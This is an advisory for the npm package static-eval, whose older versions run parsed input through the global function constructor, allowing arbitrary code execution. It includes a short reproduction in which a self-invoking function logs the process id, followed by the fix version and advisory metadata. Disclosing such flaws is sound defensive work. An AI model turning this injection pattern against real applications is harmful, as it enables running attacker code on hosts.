Affected versions of static-eval pass untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.
// Reproduction from the advisory: in affected versions the evaluated call
// expression reaches the global function constructor, so the source passed
// to the evaluator executes in the host process. Fixed in 2.0.0 or later.
const evaluate = require('static-eval');
const { parse } = require('esprima');

// A self-invoking function expression; the evaluator is handed an empty
// variable scope, which does not stop the call from running.
const src = '(function(){console.log(process.pid)})()';
const ast = parse(src).body[0].expression;
const res = evaluate(ast, {});
// Will print the process id
Update to version 2.0.0 or later.
{ "nvd_published_at": null, "github_reviewed_at": "2020-06-16T21:16:46Z", "github_reviewed": true, "severity": "MODERATE", "cwe_ids": [ "CWE-20" ] }